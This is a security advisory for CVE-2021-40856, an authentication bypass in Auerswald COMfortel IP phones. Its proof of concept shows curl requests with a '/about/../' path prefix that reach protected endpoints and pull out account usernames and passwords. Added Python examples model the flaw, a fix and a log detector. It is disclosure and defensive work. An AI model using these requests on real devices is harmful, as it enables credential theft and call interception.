Auerswald COMfortel 1400/2600/3600 IP 2.8F Authentication Bypass

Posted Dec 6, 2021
Site redteam-pentesting.de

RedTeam Pentesting discovered a vulnerability in the web-based configuration management interface of the Auerswald COMfortel 1400 and 2600 IP desktop phones. The vulnerability allows accessing configuration data and settings in the web-based management interface without authentication. Versions 2.8F and below are affected.

tags | exploit, web
advisories | CVE-2021-40856
SHA-256 | a81f22dfd946e817d23fb35f271231f89fc1fa3368c9f66e528ef931719ac208

Advisory: Auerswald COMfortel 1400/2600/3600 IP Authentication Bypass


RedTeam Pentesting discovered a vulnerability in the web-based
configuration management interface of the Auerswald COMfortel 1400 and
2600 IP desktop phones. The vulnerability allows accessing configuration
data and settings in the web-based management interface without
authentication.


Details
=======

Product: Auerswald COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP
Affected Versions: <= 2.8F
Fixed Versions: 2.8G (for COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP)
Vulnerability Type: Authentication Bypass
Security Risk: high
Vendor URL: https://www.auerswald.de
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-004
Advisory Status: published
CVE: CVE-2021-40856
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40856


Introduction
============

"The COMfortel 2600 IP is an Android-based hybrid VoIP telephone (SIP and
IP system phone), with 4.3" colour touch display and preconfigured
answering machine"

(from the vendor's homepage)


More Details
============

During a penetration test it was discovered that several VoIP phones
(COMfortel 2600 and 1400 IP) by the manufacturer Auerswald allow
accessing administrative functions without login credentials, bypassing
the authentication. This can be achieved by simply prefixing API
endpoints that require authentication with "/about/../", since the
"/about" endpoint does not require any authentication.
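
The advisory does not show the phone's firmware code, so the following Python model is an added example (not the advisory's or the vendor's code) of the defect class the bypass implies: a public-endpoint allow-list evaluated on the raw request target, placed next to the hardened check that evaluates the canonical path the handler actually dispatches on. The endpoint names come from the advisory; the function names and the two-check structure are assumptions made for illustration.

```python
from posixpath import normpath
from urllib.parse import unquote, urlsplit

# Endpoints the advisory shows as reachable without a session.
PUBLIC_PATHS = ("/about", "/statics")

def _is_public(path: str) -> bool:
    return any(path == p or path.startswith(p + "/") for p in PUBLIC_PATHS)

def canonical_path(target: str) -> str:
    """Path a route or file resolver actually dispatches on: query dropped,
    percent-decoded, '.'/'..' segments collapsed ('/about/../tree' -> '/tree')."""
    path = unquote(urlsplit(target).path) or "/"
    return "/" + normpath(path).lstrip("/")

def is_public_vulnerable(target: str) -> bool:
    """Defect model (an assumption, the firmware is not shown in the advisory):
    the allow-list is matched against the raw path, so
    '/about/../tree?action=get' counts as living under '/about'."""
    return _is_public(urlsplit(target).path)

def is_public_fixed(target: str) -> bool:
    """Hardened: match the allow-list against the canonical path, the same form
    the handler lookup uses, so dot-segments cannot change the verdict."""
    return _is_public(canonical_path(target))

def gate(target: str, has_session: bool, public_check) -> int:
    """HTTP status the authentication gate would answer with: 200 or 401."""
    return 200 if has_session or public_check(target) else 401

if __name__ == "__main__":
    probes = ("/about?action=get", "/tree?action=get",
              "/about/../tree?action=get", "/about/../account?action=list")
    for t in probes:
        print(f"{t:36} vulnerable={gate(t, False, is_public_vulnerable)} "
              f"fixed={gate(t, False, is_public_fixed)}")
```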


Proof of Concept
================

The phones run a web-based management interface on Port 80. If accessed,
the HTTP response code 401 together with a website redirecting to the
path "/statics/pageChallenge.html" is returned. This can for example be
seen using the command-line HTTP client curl[1] as follows:

------------------------------------------------------------------------
$ curl --include 'http://192.168.1.190/'
HTTP/1.1 401 Unauthorized
[...]

<!DOCTYPE html><html><head><meta http-equiv='refresh' content='0;
URL=/statics/pageChallenge.html'></head><body></body></html>
------------------------------------------------------------------------

The website contains JavaScript code that requests the path
"/about?action=get" and loads a JSON document (formatted and shortened
to increase readability):

------------------------------------------------------------------------
$ curl --include 'http://192.168.1.190/about?action=get'

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Cache-Control: no-cache
Content-Length: 3673
Date: Mon, 30 Aug 2021 08:39:24 GMT
Server: lighttpd

{
  "DATA": {
    "firmware": {
      "TYPE": "DATAITEM",
      "VALUE": "2.8E",
      "KEY": "firmware"
    },
    "serial": {
      "TYPE": "DATAITEM",
      "VALUE": "1234567890",
      "KEY": "serial"
    },
    [...]
  }
}

------------------------------------------------------------------------

Among other information, this JSON document contains the serial number
and firmware version displayed on the website. This action can be
accessed without authentication. Other endpoints require authentication,
for example the path "/tree?action=get", from which the menu structure
is loaded after successful authentication:

------------------------------------------------------------------------
$ curl --include 'http://192.168.1.190/tree?action=get'
HTTP/1.1 401 Unauthorized
[...]

<!DOCTYPE html><html><head><meta http-equiv='refresh' content='0;
URL=/statics/pageChallenge.html'></head><body></body></html>
------------------------------------------------------------------------

During the penetration test, it was discovered that this action can
successfully be requested by inserting the prefix "/about/../". In order
to prevent curl from normalizing the URL path, the option "--path-as-is"
must be supplied:

------------------------------------------------------------------------
$ curl --include --path-as-is \
'http://192.168.1.190/about/../tree?action=get'

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Cache-Control: no-cache
Content-Length: 3808
Date: Mon, 30 Aug 2021 08:42:11 GMT
Server: lighttpd

{
  "TYPE": "TREENODEPAGE",
  "ITEMS": {
    "COUNT": 2,
    "TYPE": "ITEMLIST",
    "1": {
      "id": 31,
      "text": "applications_settings",
      "TYPE": "TREENODEPAGE",
      "ITEMS": {
        "COUNT": 1,
        "TYPE": "ITEMLIST",
        "0": {
          "target": "pageFunctionkeys.html",
          "id": 32,
          "action": "/functionkeys",
          "text": "key_app",
          "pagename": "Functionkeys",
          "TYPE": "TREENODEPAGE"
        }
      }
    },
    [...]
  }
}
------------------------------------------------------------------------

The endpoint "/account" allows listing account data:

------------------------------------------------------------------------
$ curl --include --path-as-is \
'http://192.168.1.190/about/../account?action=list'

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Cache-Control: no-cache
Content-Length: 793
Date: Mon, 30 Aug 2021 08:43:33 GMT
Server: lighttpd

{
  "DATA": {
    [...]
    "accountList0": {
      "KEY": "accountList0",
      "COUNT": 1,
      "TYPE": "DATAMODEL",
      "VALUE": {
        "0": {
          "ID": 32327,
          "PARENTID": 0,
          "PROVIDER": "ProviderName",
          "NAME": "123 Example User",
          "STATUS": 4,
          "DEFAULT": 1
        }
      },
      [...]
    },
  }
}
------------------------------------------------------------------------

The ID 32327 can then be used to get details about that particular
account, including the username and password:

------------------------------------------------------------------------
$ curl --include --path-as-is \
'http://192.168.1.190/about/../account?action=get&itemID=32327'

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
Cache-Control: no-cache
Content-Length: 2026
Date: Mon, 30 Aug 2021 08:44:13 GMT
Server: lighttpd

{
  "DATA": {
    [...]
    "Benutzer": {
      "TYPE": "DATAITEM",
      "VALUE": "123",
      "KEY": "Benutzer"
    },
    "Passwort": {
      "TYPE": "DATAITEM",
      "VALUE": "secret",
      "KEY": "Passwort"
    },
    [...]
  }
}
------------------------------------------------------------------------

Using a script for Zed Attack Proxy[2], RedTeam Pentesting managed to
access and use the web-based management interface as if regular login
credentials were presented.

It is likely that other functionality can be accessed in the same way,
to for example change settings or activate the integrated option for
recording the Ethernet traffic.
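
As an added example that is not part of the advisory, a defender can pick out both attempts and successful bypasses of this kind in the web server's access log by comparing each raw request path with its canonical form: a request whose raw path sits under "/about" but resolves to another endpoint is the advisory's pattern, and a 200 status on such a request means the bypass worked. The log lines below are constructed in common log format to mirror the curl calls above; the format and the field names are assumptions.

```python
import re
from posixpath import normpath
from urllib.parse import unquote, urlsplit

# Constructed common-log-format lines standing in for a phone's access log;
# the request lines mirror the advisory's curl calls (not a real capture).
SAMPLE_LOG = """\
192.168.1.50 - - [30/Aug/2021:08:39:24 +0000] "GET /about?action=get HTTP/1.1" 200 3673
192.168.1.50 - - [30/Aug/2021:08:40:02 +0000] "GET /tree?action=get HTTP/1.1" 401 312
192.168.1.50 - - [30/Aug/2021:08:42:11 +0000] "GET /about/../tree?action=get HTTP/1.1" 200 3808
192.168.1.50 - - [30/Aug/2021:08:43:33 +0000] "GET /about/../account?action=list HTTP/1.1" 200 793
192.168.1.50 - - [30/Aug/2021:08:44:13 +0000] "GET /about/../account?action=get&itemID=32327 HTTP/1.1" 200 2026
192.168.1.51 - - [30/Aug/2021:09:01:00 +0000] "GET /statics/pageChallenge.html HTTP/1.1" 200 1501
192.168.1.52 - - [30/Aug/2021:09:02:00 +0000] "GET /about/../tree?action=get HTTP/1.1" 401 312
"""

PUBLIC_PATHS = ("/about", "/statics")   # reachable without a session per the advisory

LINE_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def canonical_path(target: str) -> str:
    """Path the server ends up serving: query dropped, percent-decoded,
    '.'/'..' segments collapsed ('/about/../tree?action=get' -> '/tree')."""
    path = unquote(urlsplit(target).path) or "/"
    return "/" + normpath(path).lstrip("/")

def is_public(path: str) -> bool:
    return any(path == p or path.startswith(p + "/") for p in PUBLIC_PATHS)

def find_bypass_attempts(log_text: str) -> list[dict]:
    """Flag requests whose raw path sits under a public endpoint but resolves
    to a protected one; a 200 status means the bypass actually succeeded."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # not an access-log line; skip it
        raw = urlsplit(m["target"]).path
        resolved = canonical_path(m["target"])
        if is_public(raw) and not is_public(resolved):
            hits.append({"src": m["src"], "ts": m["ts"], "raw": raw,
                         "resolved": resolved, "status": int(m["status"]),
                         "succeeded": m["status"] == "200"})
    return hits

if __name__ == "__main__":
    for hit in find_bypass_attempts(SAMPLE_LOG):
        print(hit)
```

This only works when the log records the request line as received; a reverse proxy that collapses dot-segments before logging or forwarding would hide the pattern, so the log closest to the device is the one to inspect.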


Workaround
==========

Disable the web-based management interface if possible.


Fix
===

Upgrade to a firmware version which corrects this vulnerability.


Security Risk
=============

Inserting the prefix "/about/../" allows bypassing the authentication
check for the web-based configuration management interface. This enables
attackers to gain access to the login credentials used for
authentication at the PBX, among other data.

Attackers can then authenticate at the PBX as the respective phone and
for example call premium rate phone lines they operate to generate
revenue. They can also configure a device they control as the PBX in the
phone, so all incoming and outgoing phone calls are intercepted and can
be recorded. The device also contains a function to record all Ethernet
data traffic, which is likely affected as well.

Overall, the vulnerability completely bypasses the authentication for
the web-based management interface and therefore poses a high risk.


References
==========

[1] https://curl.se
[2] https://github.com/zaproxy/zaproxy/

Timeline
========

2021-08-26 Vulnerability identified
2021-09-01 Customer approved disclosure to vendor
2021-09-10 Vendor notified
2021-09-10 CVE ID requested
2021-09-10 CVE ID assigned
2021-10-04 Vendor provides access to device with fixed firmware
2021-10-05 RedTeam Pentesting examines device, vulnerability seems to be corrected
2021-10-14 Vendor releases corrected firmware version 2.8G
2021-12-06 Advisory published


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/


--
RedTeam Pentesting GmbH                     Tel.: +49 241 510081-0
Dennewartstr. 25-27                         Fax : +49 241 510081-99
52068 Aachen                                https://www.redteam-pentesting.de
Germany                                     Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen